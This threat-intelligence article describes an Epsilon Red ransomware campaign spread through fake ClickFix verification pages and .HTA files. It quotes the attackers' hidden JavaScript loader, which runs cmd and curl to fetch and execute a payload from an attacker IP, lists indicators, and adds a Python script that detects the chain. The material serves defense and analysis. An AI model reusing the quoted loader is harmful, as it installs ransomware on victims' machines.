Cybercriminals Exploit .HTA Files to Deploy Epsilon Red Ransomware

In July 2025, a sophisticated ransomware campaign emerged, utilizing weaponized HTML Application (.HTA) files to distribute the Epsilon Red ransomware strain. This global operation employs deceptive ClickFix verification pages to target users of popular platforms such as Discord, Twitch, Kick, and OnlyFans.

Deceptive Tactics and Execution

The attackers craft counterfeit verification portals that prompt users to confirm they are human before accessing content. Upon interaction, these portals redirect users to secondary pages that rely on ActiveX controls, a legacy Windows technology still enabled on many systems. Because mshta.exe hosts the resulting HTML Application as a fully trusted program inside the Internet Explorer (MSHTML) rendering engine, script on the page can instantiate COM objects and run arbitrary commands, sidestepping the download warnings and sandboxing a modern browser would apply.

CloudSEK researchers have observed that this redirection strategy marks a significant evolution from previous Epsilon Red campaigns, which relied on clipboard-based lures. The current approach has notably increased the success rate of infections.

Technical Breakdown of the Attack

The attack starts with an .HTA file processed by mshta.exe. Its JavaScript creates a WScript.Shell COM object and uses it to run a single cmd.exe command line that changes to the user’s profile directory, downloads a malicious executable named `vir.exe` from an attacker-controlled server with curl, saves it locally as `a.exe`, and launches it. The second argument to `Run` (0) hides the console window, so the user sees nothing. The command used is:

```javascript
var shell = new ActiveXObject("WScript.Shell");
// 0 = hidden window: the download and execution produce no visible console
shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe", 0);
```

To divert the user’s attention while the payload runs, the script also opens a visible console showing a fake verification code:

```javascript
shell.Run("cmd /c echo Your Verification Code Is: P3L9X & pause");
```

Once executed, the ransomware runs with the privileges of the logged-in user (no exploit or privilege escalation is involved), establishes persistence through scheduled tasks (`schtasks`), and performs network discovery to identify additional targets.

Infrastructure and Attribution

Analysis by CloudSEK has linked the campaign’s infrastructure to the domains twtich[.]cc and capchabot[.]cc and to the IP addresses 155.94.155.227 (port 2269) and 213.209.150.188 (port 8112). The shared infrastructure suggests a coordinated effort by a single group of threat actors.

Implications and Security Concerns

Victims experience rapid data encryption characteristic of Epsilon Red ransomware, accompanied by ransom notes reminiscent of those used by the REvil group, albeit with minor grammatical differences.

This attack vector highlights a structural weakness rather than a software bug: a legacy scripting host that will run native binaries straight from what looks like a web page. Nothing in the chain is a browser download in the usual sense. curl writes `a.exe` without the Mark-of-the-Web zone identifier, so SmartScreen and download quarantine never inspect it, and mshta.exe, cmd.exe and curl.exe are signed Microsoft binaries that many endpoint policies allow by default. Organizations that rely on web-based productivity tools or permit unmanaged browser plugins are particularly exposed.

Mitigation Strategies

To defend against this threat, organizations should consider the following measures:

– Disable ActiveX and Windows Script Host (WSH), and block mshta.exe: Use Group Policy to turn off legacy script execution vectors such as WScript.Shell and ActiveXObject. Note that WScript.Shell is an ordinary COM object and that the WSH `Enabled` setting governs wscript.exe and cscript.exe only, so it does not by itself stop an .HTA running under mshta.exe; block mshta.exe (and, where practical, the .hta file association) with AppLocker or Windows Defender Application Control, and enable the Attack Surface Reduction rule that blocks JavaScript or VBScript from launching downloaded executable content.

– Integrate Threat Intelligence Feeds and IP Blocking: Feed the indicators above (twtich[.]cc, capchabot[.]cc, 155.94.155.227, 213.209.150.188) and other ClickFix infrastructure from threat intelligence into DNS, proxy and firewall block lists. Such infrastructure is rotated quickly, so indicator blocking supplements rather than replaces behavioural controls.

– Deploy Endpoint Behavior Analytics: Configure EDR or Sysmon-based detections for the chain itself rather than for the specific payload: mshta.exe (or wscript.exe/cscript.exe) spawning cmd.exe or powershell.exe, a command line that invokes curl, certutil or bitsadmin with a URL and then executes the downloaded file, and hidden-window executions launched through shell.Run.

– Conduct Security Awareness Training: Simulate attacks that mimic familiar services (e.g., Discord bots, Twitch) to educate users on recognizing and avoiding fake verification pages.
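The following Python script is an added example (not code from the original article or from CloudSEK) of the behavioural detection described above, run over constructed process-creation records using Sysmon Event ID 1 field names. It scores each event for the chain this article describes (a script-host parent, a shell child, a living-off-the-land downloader, a URL, immediate execution of the fetched file, staging under %userprofile% or %temp%, and the decoy text) and also catches the older clipboard-based ClickFix variant, in which the same command is pasted into the Run dialog and therefore appears under explorer.exe rather than mshta.exe. The weights, thresholds, PIDs, paths and all sample events other than the two command lines quoted from the article are assumptions made for the example.

```python
"""Score process-creation events for the HTA -> cmd -> curl -> run chain.

Added example. Events are plain dicts with Sysmon Event ID 1 field names
(ProcessId, Image, ParentImage, CommandLine); weights and thresholds are
assumptions chosen for illustration, not a vendor rule set.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Script hosts that HTA/ClickFix lures use to reach a shell.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Living-off-the-land downloaders; none of them stamp Mark-of-the-Web.
DOWNLOADER = re.compile(r"\b(?:curl|certutil|bitsadmin|wget)(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://\S+", re.I)
# "&& a.exe" / "&& start a.exe": run whatever was just fetched.
RUN_AFTER = re.compile(r"&&\s*(?:start\s+)?\"?[\w.%\\-]+\.exe\"?", re.I)
STAGING_DIR = re.compile(r"%(?:userprofile|temp|appdata|localappdata|public)%", re.I)
DECOY = re.compile(r"verification code", re.I)


@dataclass
class Alert:
    pid: int
    score: int
    severity: str
    indicators: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Alert]:
    """Return an Alert when the event looks like a script-host download-and-run chain."""
    cmd = ev.get("CommandLine", "")
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    # (matched?, weight, label). The hidden-window flag passed to shell.Run is
    # not visible in process-creation telemetry, so it is not scored here.
    checks = [
        (parent in SCRIPT_HOSTS, 2, "parent is a script host (mshta/wscript/cscript)"),
        (image in SHELLS, 1, "command shell spawned"),
        (bool(DOWNLOADER.search(cmd)), 1, "LOLBin downloader on command line"),
        (bool(URL.search(cmd)), 1, "remote URL on command line"),
        (bool(RUN_AFTER.search(cmd)), 2, "runs a file right after fetching it"),
        (bool(STAGING_DIR.search(cmd)), 1, "stages payload in a user-writable directory"),
        (bool(DECOY.search(cmd)), 1, "ClickFix decoy text"),
    ]
    hits = [label for ok, _, label in checks if ok]
    score = sum(weight for ok, weight, _ in checks if ok)
    if score < 4:  # a lone curl or a lone cmd.exe is ordinary admin activity
        return None
    return Alert(ev.get("ProcessId", 0), score, "high" if score >= 6 else "medium", hits)


def detect(events) -> list:
    """Run score_event over a batch and keep only the alerts."""
    return [a for a in (score_event(e) for e in events) if a is not None]


# Constructed sample telemetry. Command lines 1 and 2 are the ones quoted in the
# article; PIDs, paths and the benign and clipboard-variant events are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd /c cd /D %userprofile% && curl -s -o a.exe "
                    "http://155.94.155.227:2269/dw/vir.exe && a.exe"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd /c echo Your Verification Code Is: P3L9X & pause"},
    {"ProcessId": 5011, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
    # Clipboard/Run-dialog ClickFix variant: same chain, parent is explorer.exe.
    {"ProcessId": 5200, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c curl -o %temp%\update.exe http://example.invalid/u.exe "
                    r"&& %temp%\update.exe"},
    # Legitimate scripted download: curl and a URL, but nothing is executed after.
    {"ProcessId": 5300, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c curl -s -o report.csv https://intranet.example.invalid/report"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"pid={alert.pid} {alert.severity} (score {alert.score}): "
              + "; ".join(alert.indicators))
```

Run as-is it reports the article's download-and-run command line as high, the decoy prompt under mshta.exe as medium, and the clipboard variant under explorer.exe as high, while the plain `dir` and the scripted CSV download stay below the threshold. Scoring the chain rather than matching a hash or IP means the rule survives the attackers renaming `vir.exe` or moving to a new server; the weights are a starting point to tune against your own baseline of script-host activity.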

By implementing these strategies, organizations can enhance their resilience against sophisticated ransomware campaigns that exploit legacy technologies and social engineering tactics.